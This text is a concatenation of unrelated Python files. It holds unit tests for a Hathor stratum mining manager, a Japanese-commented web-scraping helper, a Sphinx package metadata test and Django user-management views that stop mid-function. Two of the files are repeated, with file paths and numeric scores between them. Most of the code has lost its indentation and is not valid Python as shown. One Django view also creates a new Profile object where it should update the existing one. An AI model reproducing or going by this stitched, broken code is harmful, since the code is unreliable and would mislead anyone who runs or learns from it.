for idx, conn in enumerate(connections):
conn.connection_lost(exc=None)
self.assertEqual(qty - idx - 1, len(self.manager.connections))
self.assertEqual(qty - idx - 1, len(self.manager.miners))
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_some_jsonrpc_methods(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
conn.send_result = MagicMock(return_value=None)
conn.method_extranonce_subscribe(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
conn.send_result = MagicMock(return_value=None)
conn.method_multi_version(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
def test_miner_method_subscribe_invalid_address1(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'abc!'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address2(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'ZiCa'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address3(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHXXX'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_valid_address(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_not_called()
transport.close.assert_not_called()
def _get_ready_miner(self, address: Optional[str] = None) -> StratumProtocol:
conn = StratumProtocol(self.manager)
conn._update_job_timestamp = False
transport = Mock()
conn.connection_made(transport=transport)
if address:
params = {'address': address}
else:
params = {}
conn.method_subscribe(params=params, msgid=None)
conn.method_authorize(params=None, msgid=None)
return conn
def test_miner_invalid_address(self):
conn = StratumProtocol(self.manager)
conn.send_error = MagicMock(return_value=None)
transport = Mock()
conn.connection_made(transport=transport)
params = {'address': 'X'}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_ADDRESS)
def test_miner_only_blocks_submit_failed_1(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params={}, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_2(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'abc!',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_3(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'ffff',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.JOB_NOT_FOUND)
def test_miner_only_blocks_submit_failed_4(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': 'FFZZ',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_5(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
def test_miner_only_blocks_submit(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Second submission: stale job
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn.current_job.height)
# conn.connection_lost(exc=None)
# self.loop.run_until_complete(self.manager.stop())
def test_miner_only_blocks_update_block(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# Hathor full node returned a new block template.
self.client.next_block_template()
self.loop.run_until_complete(self.manager.update_block_template())
self._run_all_pending_events()
self.assertEqual(1, conn.current_job.height)
def test_two_miners_same_submission_1(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
self.assertEqual(0, conn2.current_job.height)
# First submission: success
params = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn1.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_called_once()
# As the main loop is not running, the jobs have not been updated yet.
# Second submission: success, but it won't be propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def test_two_miners_same_submission_2(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
self.assertEqual(0, conn2.current_job.height)
params1 = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
params2 = {
'job_id': conn2.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
# First submission: success
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
conn1.method_submit(params=params1, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
# Run the main loop to update the jobs.
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn1.current_job.height)
self.assertEqual(1, conn2.current_job.height)
# As jobs have been updated, the submission from the second miner will be accepted but not propagated.
# Second submission: success and not propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params2, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def _run_basic_tx_tests(self, conn, tx_data, tx_nonce):
job = TxJob(tx_data)
ret = self.manager.add_job(job)
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job)
self.assertTrue(ret)
# First submission: wrong nonce
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '84e20000',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
conn.send_result.assert_not_called()
self.assertFalse(conn.current_job.is_block)
# Second submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': tx_nonce,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Third submission: stale
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
def test_one_miner_one_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TX1_DATA, TX1_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_one_miner_two_txs(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
job1 = TxJob(TX1_DATA)
job2 = TxJob(TX2_DATA)
ret1 = self.manager.add_job(job1)
ret2 = self.manager.add_job(job2)
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job1)
self.assertTrue(ret1)
self.assertTrue(ret2)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': TX1_NONCE,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Run loop and check that the miner gets the next tx
self._run_all_pending_events()
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job2)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': TX2_NONCE,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_mining_tx_connection_lost(self):
conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn1.current_job)
self.assertTrue(conn1.current_job.is_block)
self.assertEqual(0, conn1.current_job.height)
conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn2.current_job)
self.assertTrue(conn2.current_job.is_block)
self.assertEqual(0, conn2.current_job.height)
job = TxJob(TX1_DATA)
ret = self.manager.add_job(job)
self.assertTrue(ret)
self.assertFalse(conn1.current_job.is_block)
self.assertEqual(conn1.current_job.tx_job, job)
self.assertEqual(conn2.current_job.tx_job, job)
# Miner 1 disconnects.
conn1.connection_lost(exc=None)
self.assertFalse(conn2.current_job.is_block)
self.assertEqual(conn2.current_job.tx_job, job)
# Miner 2 disconnects. Tx stays on the queue.
conn2.connection_lost(exc=None)
self.assertEqual(deque([job]), self.manager.tx_queue)
# Miner 3 connects. Tx is sent to the new miner.
conn3 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertFalse(conn3.current_job.is_block)
self.assertEqual(conn3.current_job.tx_job, job)
def test_token_creation_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TOKEN_CREATION_TX_DATA, TOKEN_CREATION_TX_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_no_miners_at_start(self):
from txstratum.constants import DEFAULT_EXPECTED_MINING_TIME
expected_queue_time = 0
job1 = TxJob(TX1_DATA)
self.assertTrue(self.manager.add_job(job1))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job1.expected_mining_time)
self.assertEqual(0, job1.expected_queue_time)
self.assertEqual(1, len(self.manager.tx_queue))
if DEFAULT_EXPECTED_MINING_TIME > 0:
expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
job2 = TxJob(TX2_DATA)
self.assertTrue(self.manager.add_job(job2))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job2.expected_mining_time)
self.assertEqual(expected_queue_time, job2.expected_queue_time)
self.assertEqual(2, len(self.manager.tx_queue))
if DEFAULT_EXPECTED_MINING_TIME > 0:
expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
job3 = TxJob(TOKEN_CREATION_TX_DATA)
self.assertTrue(self.manager.add_job(job3))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job3.expected_mining_time)
self.assertEqual(expected_queue_time, job3.expected_queue_time)
self.assertEqual(3, len(self.manager.tx_queue))
self.assertEqual([job1, job2, job3], list(self.manager.tx_queue))
# First miner connects and receives job1.
conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn1.current_job)
self.assertEqual(job1, conn1.current_job.tx_job)
# Second miner connects and receives job1.
conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn2.current_job)
self.assertEqual(job1, conn2.current_job.tx_job)
class ManagerClockedTestCase(asynctest.ClockedTestCase):  # type: ignore
    """Time-based manager tests driven by asynctest's controllable clock."""

    def setUp(self):
        """Start a manager against the fake client, with a patched clock."""
        address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
        from tests.utils import Clock
        self.clock = Clock(self.loop)
        self.clock.enable()
        self.client = HathorClientTest(server_url='')
        self.loop.run_until_complete(self.client.start())
        self.manager = TxMiningManager(backend=self.client, address=address)
        self.loop.run_until_complete(self.manager.start())
        self.loop.run_until_complete(self.manager.wait_for_block_template())
        self.assertTrue(len(self.manager.block_template) > 0)

    def tearDown(self):
        self.clock.disable()

    async def test_block_timestamp_update(self):
        """Job timestamp: updated when forced or recent, kept when too old."""
        job = self.manager.get_best_job(None)
        # Fix: this was `self.assertTrue(True, job.is_block)`, which always
        # passes because the second argument is only the failure message.
        self.assertTrue(job.is_block)
        job.update_timestamp(force=True)
        self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
        # Update timestamp.
        await self.advance(10)
        job.update_timestamp()
        self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
        # Do not update timestamp.
        old_ts = txstratum.time.time()
        await self.advance(40)
        job.update_timestamp()
        self.assertEqual(int(old_ts), job._block.timestamp)

    async def test_tx_resubmit(self):
        """A duplicate tx job is declined while pending, accepted after timeout."""
        job1 = TxJob(TX1_DATA, timeout=10)
        ret1 = self.manager.add_job(job1)
        self.assertTrue(ret1)
        # When a similar job is submitted, manager declines it.
        job2 = TxJob(TX1_DATA)
        ret2 = self.manager.add_job(job2)
        self.assertFalse(ret2)
        # Wait until job1 is marked as timeout.
        await self.advance(15)
        self.assertEqual(job1.status, JobStatus.TIMEOUT)
        # Try to resubmit a similar job.
        job3 = TxJob(TX1_DATA)
        ret3 = self.manager.add_job(job3)
        self.assertTrue(ret3)

    async def test_tx_timeout_and_cleanup(self):
        """A timed-out tx leaves the queue immediately and tx_jobs after cleanup."""
        job1 = TxJob(TX1_DATA, timeout=10)
        ret1 = self.manager.add_job(job1)
        self.assertTrue(ret1)
        self.assertIn(job1, self.manager.tx_queue)
        self.assertIn(job1.uuid, self.manager.tx_jobs)
        # Wait until job1 is marked as timeout.
        await self.advance(15)
        self.assertEqual(job1.status, JobStatus.TIMEOUT)
        self.assertNotIn(job1, self.manager.tx_queue)
        self.assertIn(job1.uuid, self.manager.tx_jobs)
        # Wait until job1 is cleared.
        await self.advance(self.manager.TX_CLEAN_UP_INTERVAL)
        self.assertNotIn(job1, self.manager.tx_queue)
        self.assertNotIn(job1.uuid, self.manager.tx_jobs)

    async def test_tx_race_condition(self):
        """Test race condition caused when job2 replaces job1 and job1's clean up is close to be executed.

        In this case job1's clean up was cleaning job2 instead.
        """
        job1 = TxJob(TX1_DATA, timeout=10)
        ret1 = self.manager.add_job(job1)
        self.assertTrue(ret1)
        # Wait until job1 is marked as timeout.
        await self.advance(10)
        self.assertEqual(job1.status, JobStatus.TIMEOUT)
        self.assertNotIn(job1, self.manager.tx_queue)
        self.assertIn(job1.uuid, self.manager.tx_jobs)
        # We are 1 second away to cleanup the tx.
        await self.advance(self.manager.TX_CLEAN_UP_INTERVAL - 1)
        # Resubmit a similar job.
        job2 = TxJob(TX1_DATA, timeout=10)
        ret2 = self.manager.add_job(job2)
        self.assertTrue(ret2)
        self.assertIn(job2, self.manager.tx_queue)
        self.assertIn(job2.uuid, self.manager.tx_jobs)
        # Reach the cleanup time of job1. Job1's cleanup must not touch job2.
        await self.advance(2)
        self.assertEqual(job2.status, JobStatus.ENQUEUED)
        self.assertIn(job2, self.manager.tx_queue)
        self.assertIn(job2.uuid, self.manager.tx_jobs)
        # Job2 timeouts.
        await self.advance(15)
        self.assertEqual(job2.status, JobStatus.TIMEOUT)
import logging
import socket
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse, parse_qs
from bs4 import BeautifulSoup
from django.utils.translation import gettext
from pypeach_django.app_config import AppConfig
"""
Scrapy関連の共通処理を定義する
"""
class ScrapyHelper:
@staticmethod
def get_html(url, parse_flag=None):
"""
scrapyを行いhtmlを取得する
"""
# User-Agentを定義する
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) ' \
'AppleWebKit/537.36 (KHTML, like Gecko) ' \
'Chrome/55.0.2883.95 Safari/537.36 '
# アクセスのリトライ回数を指定する
retry_max_count = AppConfig.get_properties("url_request_retry_max_count")
response_html = None
for i in range(0, retry_max_count):
try:
# Webアクセス時のUser-Agentを指定する
logging.debug("request settings")
req = urllib.request.Request(url, headers={'User-Agent': ua})
# Webアクセスの読み込みを行う
logging.debug("request read start")
with urllib.request.urlopen(req, timeout=AppConfig.get_properties("url_request_read_timeout")) as f:
html = f.read().decode('utf-8')
logging.debug("request read end")
# レスポンスをHTMLパーサーでパースする
logging.debug("request parse start")
if parse_flag is True:
response_html = BeautifulSoup(html, 'lxml')
else:
response_html = html
logging.debug("request parse end")
if response_html is not None and len(response_html) > 0:
break
except HTTPError as e:
# HTTPError時のメッセージを出力する
logging.info(gettext("I801"), url, e.code, e.msg)
except URLError as error:
# タイムアウトを判定する
if isinstance(error.reason, socket.timeout):
logging.info(gettext("I802"), url)
else:
logging.info(gettext("E991"), error.reason)
raise URLErrorException(gettext("E990") % url)
except socket.timeout:
logging.info(gettext("I802"), url)
except ConnectionResetError as error:
# [Errno 104] Connection reset by peerを回避する
logging.info(gettext("I802"), url)
except Exception as error:
logging.info(gettext("E991"), error)
raise ScrapyIllegalException(gettext("E990") % url)
# レスポンスがない場合はExceptionにする
if response_html is None:
error_msg = "{}:{}".format(gettext("E803"), url)
raise HttpErrorException(error_msg)
return response_html
@staticmethod
def is_exists_class_name(html, class_name):
"""
html内のクラス有無をチェックする
"""
is_exists_flag = False
try:
# class有無を判定する
if len(html.select('.' + class_name)) > 0 or class_name in html["class"]:
is_exists_flag = True
except (KeyError, AttributeError):
# エラーの場合はfalseを返却する
pass
return is_exists_flag
@staticmethod
def get_url_parameter(url, parameter_name):
"""
URLのパラメータ値を取得する
"""
try:
# URLをパースして指定されたパラメータ名を取得する
url_parse = urlparse(url)
url_query = parse_qs(url_parse.query)
value = url_query[parameter_name][0]
except KeyError as e:
# エラーの場合はログを出力してNoneを返却する
logging.debug(gettext("W801"), e)
return None
return value
class HttpErrorException(Exception):
"""
Exception(httpエラー)を定義する
"""
pass
class URLErrorException(Exception):
"""
Exception(サーバ接続エラー)を定義する
"""
pass
class ScrapyIllegalException(Exception):
"""
Exception(その他エラー)を定義する
"""
pass | backend/chart/application/helper/scrapy.py | import logging
import socket
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse, parse_qs
from bs4 import BeautifulSoup
from django.utils.translation import gettext
from pypeach_django.app_config import AppConfig
"""
Scrapy関連の共通処理を定義する
"""
class ScrapyHelper:
@staticmethod
def get_html(url, parse_flag=None):
"""
scrapyを行いhtmlを取得する
"""
# User-Agentを定義する
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) ' \
'AppleWebKit/537.36 (KHTML, like Gecko) ' \
'Chrome/55.0.2883.95 Safari/537.36 '
# アクセスのリトライ回数を指定する
retry_max_count = AppConfig.get_properties("url_request_retry_max_count")
response_html = None
for i in range(0, retry_max_count):
try:
# Webアクセス時のUser-Agentを指定する
logging.debug("request settings")
req = urllib.request.Request(url, headers={'User-Agent': ua})
# Webアクセスの読み込みを行う
logging.debug("request read start")
with urllib.request.urlopen(req, timeout=AppConfig.get_properties("url_request_read_timeout")) as f:
html = f.read().decode('utf-8')
logging.debug("request read end")
# レスポンスをHTMLパーサーでパースする
logging.debug("request parse start")
if parse_flag is True:
response_html = BeautifulSoup(html, 'lxml')
else:
response_html = html
logging.debug("request parse end")
if response_html is not None and len(response_html) > 0:
break
except HTTPError as e:
# HTTPError時のメッセージを出力する
logging.info(gettext("I801"), url, e.code, e.msg)
except URLError as error:
# タイムアウトを判定する
if isinstance(error.reason, socket.timeout):
logging.info(gettext("I802"), url)
else:
logging.info(gettext("E991"), error.reason)
raise URLErrorException(gettext("E990") % url)
except socket.timeout:
logging.info(gettext("I802"), url)
except ConnectionResetError as error:
# [Errno 104] Connection reset by peerを回避する
logging.info(gettext("I802"), url)
except Exception as error:
logging.info(gettext("E991"), error)
raise ScrapyIllegalException(gettext("E990") % url)
# レスポンスがない場合はExceptionにする
if response_html is None:
error_msg = "{}:{}".format(gettext("E803"), url)
raise HttpErrorException(error_msg)
return response_html
@staticmethod
def is_exists_class_name(html, class_name):
"""
html内のクラス有無をチェックする
"""
is_exists_flag = False
try:
# class有無を判定する
if len(html.select('.' + class_name)) > 0 or class_name in html["class"]:
is_exists_flag = True
except (KeyError, AttributeError):
# エラーの場合はfalseを返却する
pass
return is_exists_flag
@staticmethod
def get_url_parameter(url, parameter_name):
"""
URLのパラメータ値を取得する
"""
try:
# URLをパースして指定されたパラメータ名を取得する
url_parse = urlparse(url)
url_query = parse_qs(url_parse.query)
value = url_query[parameter_name][0]
except KeyError as e:
# エラーの場合はログを出力してNoneを返却する
logging.debug(gettext("W801"), e)
return None
return value
class HttpErrorException(Exception):
"""
Exception(httpエラー)を定義する
"""
pass
class URLErrorException(Exception):
"""
Exception(サーバ接続エラー)を定義する
"""
pass
class ScrapyIllegalException(Exception):
"""
Exception(その他エラー)を定義する
"""
pass | 0.226527 | 0.058373 |
from __future__ import absolute_import
from tests import util
_EXPECT_NAME = 'publishing.withsphinx'
_EXPECT_VERSION = '0.0.1'
_EXPECT_DATE = '2016-10-11'
_EXPECT_AUTHOR = '<NAME>'
_EXPECT_AUTHOR_EMAIL = '<EMAIL>'
_EXPECT_SPHINX_EXTENSION_METADATA = {
'version': _EXPECT_VERSION,
'parallel_read_safe': True,
'parallel_write_safe': True,
}
class TestMetaData(util.TestCasePublishingSphinx):
def test_package_has_extension_name_string(self):
'''
UNIT TEST: package has name string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__name__, str))
self.assertEqual(pws.__name__, _EXPECT_NAME)
def test_package_has_extension_version_string(self):
'''
UNIT TEST: package has version string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__version__, str))
self.assertEqual(pws.__version__, _EXPECT_VERSION)
def test_package_has_extension_date_string(self):
'''
UNIT TEST: package has date string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__date__, str))
self.assertEqual(pws.__date__, _EXPECT_DATE)
def test_package_has_extension_author_string(self):
'''
UNIT TEST: package has author string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author__, str))
self.assertEqual(pws.__author__, _EXPECT_AUTHOR)
def test_package_has_extension_author_email_string(self):
'''
UNIT TEST: package has author email string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author_email__, str))
self.assertEqual(pws.__author_email__, _EXPECT_AUTHOR_EMAIL)
def test_package_has_setup_returns_with_meta(self):
'''
UNIT TEST: package has setup returns with meta data
'''
import publishing.withsphinx as pws
app = util.mock.MagicMock()
self.assertEqual(pws.setup(app), _EXPECT_SPHINX_EXTENSION_METADATA)
if __name__ == "__main__":
util.main() | tests/unit/test_meta_data.py | from __future__ import absolute_import
from tests import util
_EXPECT_NAME = 'publishing.withsphinx'
_EXPECT_VERSION = '0.0.1'
_EXPECT_DATE = '2016-10-11'
_EXPECT_AUTHOR = '<NAME>'
_EXPECT_AUTHOR_EMAIL = '<EMAIL>'
_EXPECT_SPHINX_EXTENSION_METADATA = {
'version': _EXPECT_VERSION,
'parallel_read_safe': True,
'parallel_write_safe': True,
}
class TestMetaData(util.TestCasePublishingSphinx):
def test_package_has_extension_name_string(self):
'''
UNIT TEST: package has name string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__name__, str))
self.assertEqual(pws.__name__, _EXPECT_NAME)
def test_package_has_extension_version_string(self):
'''
UNIT TEST: package has version string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__version__, str))
self.assertEqual(pws.__version__, _EXPECT_VERSION)
def test_package_has_extension_date_string(self):
'''
UNIT TEST: package has date string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__date__, str))
self.assertEqual(pws.__date__, _EXPECT_DATE)
def test_package_has_extension_author_string(self):
'''
UNIT TEST: package has author string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author__, str))
self.assertEqual(pws.__author__, _EXPECT_AUTHOR)
def test_package_has_extension_author_email_string(self):
'''
UNIT TEST: package has author email string
'''
import publishing.withsphinx as pws
self.assertTrue(isinstance(pws.__author_email__, str))
self.assertEqual(pws.__author_email__, _EXPECT_AUTHOR_EMAIL)
def test_package_has_setup_returns_with_meta(self):
'''
UNIT TEST: package has setup returns with meta data
'''
import publishing.withsphinx as pws
app = util.mock.MagicMock()
self.assertEqual(pws.setup(app), _EXPECT_SPHINX_EXTENSION_METADATA)
if __name__ == "__main__":
util.main() | 0.609757 | 0.377369 |
from django.http.response import Http404, HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from rest_framework.parsers import JSONParser
from rest_framework.decorators import api_view
from django.contrib.auth.models import User
from .models import Profile
import json
@login_required
# Create your views here.
def index(request):
users = User.objects.all().select_related('profile')[:15]
return render(request, 'users/index.html', { 'users': users })
@login_required
def create(request):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
return render(request, 'users/create.html')
@login_required
def edit(request, id):
if request.user.profile.role != 'Admin':
return HttpResponseRedirect(reverse('users.index'))
users = User.objects.filter(pk=id).select_related('profile')
if len(users) <= 0:
raise Http404('User does not exists.')
return render(request, 'users/edit.html', { 'mUser': users[0] })
@login_required
@api_view(['GET'])
def search(request):
q = request.GET['q']
users = User.objects.filter(username__contains=q).select_related('profile').values('username', 'first_name', 'last_name', 'profile__role', 'profile__sex')
return JsonResponse({
'users': json.dumps(list(users))
}, safe=False)
@login_required
@api_view(['POST'])
def store(request):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.create(username=body['username'], first_name=body['first_name'], last_name=body['last_name'])
user.set_password(body['password'])
user.profile.sex = body['sex']
user.profile.role = body['role']
user.save()
return JsonResponse({
'message': 'Successfully created a user.'
}, safe=False)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['PATCH'])
def update(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
body = request.data
user = User.objects.get(pk=id)
user.username = body['username']
user.first_name = body['first_name']
user.last_name = body['last_name']
if body['password']:
user.set_password(body['password'])
profile = Profile(user=user, sex=body['sex'], role=body['role'])
user.save()
profile.save()
return JsonResponse({
'message': 'Successfully updated a user.'
}, safe=False)
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
}, safe=False, status=400)
@login_required
@api_view(['DELETE'])
def delete(request, id):
try:
if request.user.profile.role != 'Admin':
raise Exception('You do not have permsision to make this operation.')
user = User.objects.get(pk=id)
if user.is_staff:
raise Exception('You do not have permsision to make this operation.')
user.delete()
return JsonResponse({
'message': 'Successfully deleted a user.'
})
except User.DoesNotExist:
return JsonResponse({
'message': 'User does not exists.'
}, safe=False, status=400)
except Exception as e:
return JsonResponse({
'message': str(e)
